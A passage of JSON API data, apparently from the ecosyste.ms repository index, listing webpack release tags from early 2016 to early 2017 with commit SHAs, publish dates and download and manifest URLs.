s/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/